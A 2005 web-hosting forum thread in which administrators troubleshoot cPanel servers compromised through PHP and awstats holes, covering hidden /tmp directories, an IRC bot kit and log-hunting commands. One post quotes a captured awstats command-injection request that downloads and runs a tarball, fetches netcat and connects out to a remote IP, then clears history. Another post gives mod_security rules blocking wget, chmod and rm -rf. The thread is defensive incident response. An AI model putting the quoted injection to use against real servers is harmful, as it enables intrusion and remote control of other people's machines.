The Community Forums


Crazy hacker.......

Discussion in 'General Discussion' started by amal, Apr 8, 2005.

  1. amal

    amal Well-Known Member

    Joined:
    Nov 22, 2003
    Messages:
    155
    Likes Received:
    0
    Trophy Points:
    16
    Location:
    India
    cPanel Access Level:
    Root Administrator
    Hi,

    I have a really weird problem.....

    He hosted (via hack) his domain on one of our cPanel servers... the place where he hosted his site was /usr/local/apache/.../ . I removed him from the server and he went and hosted it on one of my different servers... (actually, he tried it on many servers with that IP series....). Now, after removing him several times, he has switched to another host... I have been watching this site, and it's switching servers very easily.... the website in question is http://hothackers.com

    I really don't understand how he edits the httpd.conf file (permission 644, owned by root) and adds whatever entries he likes... The kernel on our server is 2.4.29-ow1 (the Openwall kernel is meant to be a secure one)... And the kernels are statically compiled (monolithic kernel) to avoid module level hacking. He has hacked both the Redhat9 and CentOS servers..... cPanel is updated to the latest stable version... Any idea how he's hacking, and how it can be prevented? In the meantime, he doesn't have any problem hosting his site for free anywhere he wants... Luckily, he is not with me anymore... he seems to be on a server hosted by theplanet....

    And all his files are under the ownership of bin....

    Anyone had any such experiences before? Any ideas would be greatly appreciated....

    Regards,
    Amal.
     
  2. anoopkumar

    anoopkumar Member

    Joined:
    Feb 15, 2004
    Messages:
    6
    Likes Received:
    0
    Trophy Points:
    0
    Location:
    India
    They hacked my server too..

    ohhhhh, hothackers... I remember them very much... They hacked my server as well... No idea how they are doing it
     
  3. vincentg

    vincentg Well-Known Member

    Joined:
    May 12, 2004
    Messages:
    140
    Likes Received:
    2
    Trophy Points:
    18
    Location:
    new york
    Check your domlogs

    They get in mostly from holes in PHP apps.
    They then install their own shell app and god knows what.

    Also check your tmp directories for stuff like .../

    I suggest you run securetmp which helps
     
  4. iCARus

    iCARus Well-Known Member

    Joined:
    Apr 8, 2003
    Messages:
    113
    Likes Received:
    0
    Trophy Points:
    16
    Hmmm... we found 1 weird dir like:

    drwx------ 3 nobody nobody 1024 May 1 06:10 .\ /

    How to delete that? We have securetmp from the first day and nothing hacked. But this one is weird.
     
  5. chirpy

    chirpy Well-Known Member

    Joined:
    Jun 15, 2002
    Messages:
    13,475
    Likes Received:
    20
    Trophy Points:
    38
    Location:
    Go on, have a guess
    Such files/directories are usually best deleted through sFTP - if you're not careful you can end up wiping your whole server.
     
  6. Jasonbd

    Jasonbd Member

    Joined:
    Jan 4, 2004
    Messages:
    22
    Likes Received:
    0
    Trophy Points:
    1
    Location:
    Texas
    If this is the only directory in /tmp you could hit tab and it will put it in the shell prompt. I have also been able to do cd ".\ /". I usually just rename the directory then go in there to see what is there and then remove it.
     
  7. vincentg

    vincentg Well-Known Member

    Joined:
    May 12, 2004
    Messages:
    140
    Likes Received:
    2
    Trophy Points:
    18
    Location:
    new york
    It can be deleted and it's where the main hacker files are located.

    It may have a space before or after the name. They sometimes place several spaces after the name.

    So you have .../[space] or whatever ---- (where [space] is a space)

    Just do rm -fr .../

    Make sure you get the line right else you may erase the wrong thing.

    Try the cd command first - if you can cd to it then you know how to delete it.

    You need to do three things fast.
    First get rid of his files.
    Reboot the server right after you delete the files.
    Last you need to find the PHP app he used to get in.

    This is the hard part.

    Look for stuff like mydomain.com/help.php?q=http://somedomain

    The hacker passes a domain to the app and it invokes the download of the tools the hacker uses which winds up in your tmp directory.

    If you didn't use the script securetmp then you may find these files in usr/tmp or var/tmp as well.

    Securetmp makes it harder for them to do this stuff but is not 100% and a good hacker can get around it.

    Vin
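    An added example (my own code, not from the thread) that does the cleanup vincentg and Jasonbd describe without the quoting pitfalls: it lists the whitespace-and-dots names in a /tmp-style directory, prints them with trailing spaces made visible, and removes one only after checking it is a real subdirectory. The function names and the directory it is run against are my own assumptions.

```shell
#!/bin/sh
# Added example, not from the thread: handle odd names in a /tmp-style dir.
# Assumes find supports -mindepth/-maxdepth (GNU, BSD and busybox all do).

# List immediate entries whose name contains whitespace (". ", "...  ")
# or starts with three dots ("..."); find never reports "." or ".." itself.
odd_tmp_entries() {
    find "$1" -mindepth 1 -maxdepth 1 \
        \( -name '*[[:space:]]*' -o -name '...*' \) -print
}

# Print the same names unambiguously: sed's l command escapes control
# characters and ends each line with $, so a trailing space is visible
# (a dir called ". " shows up as "/tmp/. $").
show_odd_tmp_entries() {
    odd_tmp_entries "$1" | sed -n l
}

# Remove one such entry. The name is taken literally (spaces included) and
# must be a directory directly below the base; ".", ".." and anything with
# a slash are refused, so a typo cannot turn into "rm -rf /tmp" or worse.
remove_odd_dir() {
    base=$1
    name=$2
    case "$name" in ''|.|..|*/*) return 1 ;; esac
    [ -d "$base/$name" ] || return 1
    rm -rf -- "$base/$name"
}
```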
     
  8. iCARus

    iCARus Well-Known Member

    Joined:
    Apr 8, 2003
    Messages:
    113
    Likes Received:
    0
    Trophy Points:
    16
    Hello all.

    Yes, it is "/tmp/..\[space]/" and files in it:

    Code:
    drwx------    3 nobody   nobody       1024 May  1 06:10 ./
    drwxrwxrwt    7 root     root       406528 May  7 08:40 ../
    -rw-r--r--    1 nobody   nobody        307 Mar 27 11:50 1.users
    -rw-r--r--    1 nobody   nobody        393 Mar 27 11:51 2.users
    -rw-r--r--    1 nobody   nobody        393 Mar 27 11:52 3.users
    -rw-r--r--    1 nobody   nobody         45 Feb  2 14:28 bebe.tgz
    -rw-r--r--    1 nobody   nobody         34 Aug 15  2004 LinkEvents
    -rw-r--r--    1 nobody   nobody       4008 Mar 27 11:46 mech.set
    drwx------    2 nobody   nobody       1024 May  1 06:10 randfiles/
    -rwx------    1 nobody   nobody     472230 Aug 15  2004 smbd*
    -rwxr-xr-x    1 nobody   nobody         53 Aug 15  2004 start*
    
    and directory in "/tmp/\[space]./"

    Code:
    drwx------    3 nobody   nobody       1024 May  7 01:21 ./
    drwxrwxrwt    7 root     root       406528 May  7 08:44 ../
    -rw-r--r--    1 nobody   nobody        608 May  7 00:00 1.users
    -rw-r--r--    1 nobody   nobody        607 May  7 00:00 2.users
    -rw-r--r--    1 nobody   nobody        610 May  7 00:00 3.users
    -rw-r--r--    1 nobody   nobody         45 Feb  2 14:28 bebe.tgz
    -rw-r--r--    1 nobody   nobody      82057 May  7 00:00 JoJo.seen
    -rw-r--r--    1 nobody   nobody       2706 May  5 19:51 LinkEvents
    -rw-r--r--    1 nobody   nobody       1033 May  7 00:00 mech.levels
    -rw-------    1 nobody   nobody          5 May  2 12:25 mech.pid
    -rw-r--r--    1 nobody   nobody       1349 May  7 00:00 mech.session
    -rw-r--r--    1 nobody   nobody       4008 Mar 27 11:46 mech.set
    drwx------    2 nobody   nobody       1024 May  7 01:21 randfiles/
    -rwx------    1 nobody   nobody     472230 Aug 15  2004 smbd*
    -rwxr-xr-x    1 nobody   nobody         53 Aug 15  2004 start*
    -rw-r--r--    1 nobody   nobody      79359 May  7 00:00 TaKe.seen
    -rw-r--r--    1 nobody   nobody      82548 May  7 00:00 ToTo.seen
    
    Does anyone know anything about it? How to find the user account from where this was created? It looks like some bot. Hmm :(
     
    #8 iCARus, May 7, 2005
    Last edited: May 7, 2005
  9. AndyReed

    AndyReed Well-Known Member
    PartnerNOC

    Joined:
    May 29, 2004
    Messages:
    2,222
    Likes Received:
    3
    Trophy Points:
    38
    Location:
    Minneapolis, MN
    Do you have Chkrootkit and RKhunter installed on your server? Do you also have mod_security?

    You need to secure your server before it is too late.
     
  10. vincentg

    vincentg Well-Known Member

    Joined:
    May 12, 2004
    Messages:
    140
    Likes Received:
    2
    Trophy Points:
    18
    Location:
    new york
    Delete the directory and files

    run the script securetmp - this will help

    He is using your server to spread a virus by sending emails out

    You need to now find out how he got in.

    Run these commands in shell and look for any reference to tmp

    cd /usr/local/apache/domlogs

    grep "/tmp" *;grep Wget *;grep wget *

    You can run them one at a time like grep "/tmp" * if you get too much output or send the output to a file.

    You will see something like somefile.php?q=some_url
    The URL for some_url is another infected server
    I would send them an email to notify them their server has been hacked.

    Hackers use your server to A: break into other servers B: launch attacks or send virus emails out to hundreds of thousands.

    There should be a government agency to crack down on these people but there is none.
    Over time they will get better at hacking and it will create a major problem for the internet.
    Most hackers are just in the learning stages at this point - thank god for that.

    When they become pros you will have little defense and maybe no defense.

    Vin
     
  11. vincentg

    vincentg Well-Known Member

    Joined:
    May 12, 2004
    Messages:
    140
    Likes Received:
    2
    Trophy Points:
    18
    Location:
    new york
    Forgot one point - after you delete his files re-boot your server to remove any apps from memory!!!

    Very important

    Vin
     
  12. iCARus

    iCARus Well-Known Member

    Joined:
    Apr 8, 2003
    Messages:
    113
    Likes Received:
    0
    Trophy Points:
    16
    Thank you all for replies...

    1. we have installed Chkrootkit and RKhunter and everything looks ok
    2. if we try to look into domlogs we get error "-bash: /bin/grep: Argument list too long" ...is there any other way to look into over 100 logs ?
    3. we deleted created dirs in /tmp
    4. from the first day we use /tmp secured with securetmp
     
  13. vincentg

    vincentg Well-Known Member

    Joined:
    May 12, 2004
    Messages:
    140
    Likes Received:
    2
    Trophy Points:
    18
    Location:
    new york
    You should be able to run the commands one by one.

    grep "/tmp" *

    grep wget *

    grep Wget *

    The first one will most likely show the most info on your hacker.

    RKhunter is good to have but it shows false alarms for a few things.

    You can also run this:

    find / -type d -name ".*" -print

    It will search your whole hard drive for funky entries
    You will get many show up like ./foldername and some files that begin with a dot.
    Those are normal - just look for ones that are not normal looking.

    Vin
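    An added example (not from the thread) of the domlog sweep vincentg describes in the posts above, with find and xargs feeding grep in batches so that the "Argument list too long" error iCARus hit with a bare grep over hundreds of logs cannot occur; it also reduces each hit to the somefile.php?q=some_url request line. The log lines are constructed for this example (documentation IP ranges, a .invalid hostname) and the function names are mine.

```shell
#!/bin/sh
# Added example, not from the thread: sweep a domlogs directory for the
# signs vincentg lists. Log lines below are constructed for this example.

# Build a sample domlogs directory (constructed data, documentation IPs).
make_sample_domlogs() {
    dir=$(mktemp -d)
    cat > "$dir/clean.example" <<'EOF'
198.51.100.7 - - [07/May/2005:01:22:00 +0000] "GET /index.php HTTP/1.1" 200 1024 "-" "Mozilla/4.0"
EOF
    # One log with a PHP script handed a remote URL, and one with a
    # URL-encoded "cd /tmp;wget ..." stuffed into a CGI parameter.
    cat > "$dir/hacked.example" <<'EOF'
203.0.113.5 - - [07/May/2005:01:21:00 +0000] "GET /help.php?q=http://example.invalid/tools.txt HTTP/1.1" 200 512 "-" "Mozilla/4.0"
203.0.113.5 - - [07/May/2005:01:23:00 +0000] "GET /cgi-bin/awstats.pl?configdir=%20%7c%20cd%20%2ftmp%3bwget%20example.invalid%2fb.tgz HTTP/1.1" 406 352 "-" "Mozilla/4.0"
EOF
    echo "$dir"
}

# Print matching lines as file:line. find/xargs hand the file names to grep
# in batches, so this works on hundreds of logs where "grep /tmp *" fails
# with "Argument list too long". Patterns: /tmp, its URL-encoded form
# %2ftmp, wget in any case (so Wget too), and a query parameter carrying
# a URL (the help.php?q=http://somedomain shape).
scan_domlogs() {
    find "$1" -type f -print0 \
        | xargs -0 grep -iHE '/tmp|%2ftmp|wget|\?[a-z_]+=https?://' \
        || true
}

# Reduce each hit to the request path and query, which is what points at
# the vulnerable script and the remote host it was told to fetch from.
suspicious_requests() {
    scan_domlogs "$1" | sed -n 's/.*"[A-Z]* \([^ ]*\) HTTP.*/\1/p' | sort -u
}
```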
     
  14. anup123

    anup123 Well-Known Member

    Joined:
    Mar 29, 2004
    Messages:
    897
    Likes Received:
    1
    Trophy Points:
    18
    Location:
    This Planet
    I see frequent appearances of these in domlogs:

    /cgi-bin/awstats.pl?configdir=%20%7c%20cd%20%2ftmp%3bwget%20ra-ducu.go.ro%2fb.tgz%3btar%20xzvf%20b.tgz%3bcd%20b%3b.%2fstart%3bcd%20..%3brm%20-rf%20b.tgz%3brm%20-rf%20b%3bwget%20ra-ducu.go.ro%2fnc%3bchmod%20%2bx%20nc%3b.%2fnc%2066.221.209.161%2065000%3bwget%20excalibur.go.ro%2ffirewall%3bchmod%20%2bx%20firewall%3b.%2ffirewall%3bhistory%20-c%20%7c%20 HTTP/1.1" 406 352 0 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; FunWebProducts)" "-" "-"

    I do not have awstats activated. This happens on 2 domains very frequently.

    406 because of mod_sec

    and it's all coming from cihost ip : 66.221.200.58

    Anup
     
  15. HostMerit

    HostMerit Well-Known Member

    Joined:
    Oct 24, 2004
    Messages:
    160
    Likes Received:
    0
    Trophy Points:
    16
    Location:
    New Jersey, USA
    cPanel Access Level:
    DataCenter Provider
    Might want to add

    SecFilter "tar\x20"
    SecFilter "go.ro"
    SecFilter "chmod\x20"
    SecFilter "wget"
    SecFilter "rm\x20-rf"

    This should help, of course, make sure mod_security is active on servers, also remove that script, and when the process is running, use ps -u nobody to get the pid, then go to /proc/(pid) and ls -al. You may see some virtual linked files to where the files are, usually /dev/shm, or /tmp, sometimes /var/spool I've seen, sometimes even /usr/local/apache/proxy, also cat the process's environment, might be able to pull a directory from there.

    Also, this shouldn't cause any issues with regular sites, seems to be using Awstats exploit via script, or he's just uploading a script and calling it that

    SecFilter "awstats.pl"

    Since people should be accessing Awstats via cPanel regardless, it shouldn't cause any issues.

    Thanks,
    Kris
    Kris@HostMerit.com
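    An added example (not from the thread) of the /proc walk Kris describes: for a pid obtained from ps -u nobody, read where the process's cwd, exe and open files really point, dump its environment, and flag a cwd or exe under the directories he names. It assumes a Linux /proc filesystem; the function names are mine.

```shell
#!/bin/sh
# Added example, not from the thread: look at a running process through
# /proc/<pid>, as Kris describes. Assumes a Linux /proc filesystem.

# Print where the process's cwd, exe and open file descriptors really point.
proc_links() {
    pid=$1
    for link in cwd exe; do
        target=$(readlink "/proc/$pid/$link" 2>/dev/null) || target='(unreadable)'
        printf '%s: %s\n' "$link" "$target"
    done
    for fd in "/proc/$pid/fd"/*; do
        [ -e "$fd" ] || continue
        printf 'fd %s: %s\n' "${fd##*/}" "$(readlink "$fd" 2>/dev/null)"
    done
}

# Print the environment one variable per line; the file is NUL separated.
# A process spawned through a CGI script inherits that request's variables
# (SCRIPT_NAME, REMOTE_ADDR and so on), which can reveal where it came from.
proc_environ() {
    tr '\0' '\n' < "/proc/$1/environ" 2>/dev/null
}

# Succeed (exit 0) if cwd or exe lies under one of the hiding places named
# in the thread: /tmp, /dev/shm, /var/spool or /usr/local/apache/proxy.
proc_in_suspect_dir() {
    proc_links "$1" | awk '
        /^(cwd|exe): \/(tmp|dev\/shm|var\/spool|usr\/local\/apache\/proxy)(\/|$)/ { found = 1 }
        END { exit found ? 0 : 1 }'
}

# Walk every process of one user (e.g. nobody, as in "ps -u nobody") and
# print the pids that look out of place.
suspect_processes_of() {
    for pid in $(ps -u "$1" -o pid= 2>/dev/null); do
        proc_in_suspect_dir "$pid" && printf '%s\n' "$pid"
    done
    return 0
}
```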
     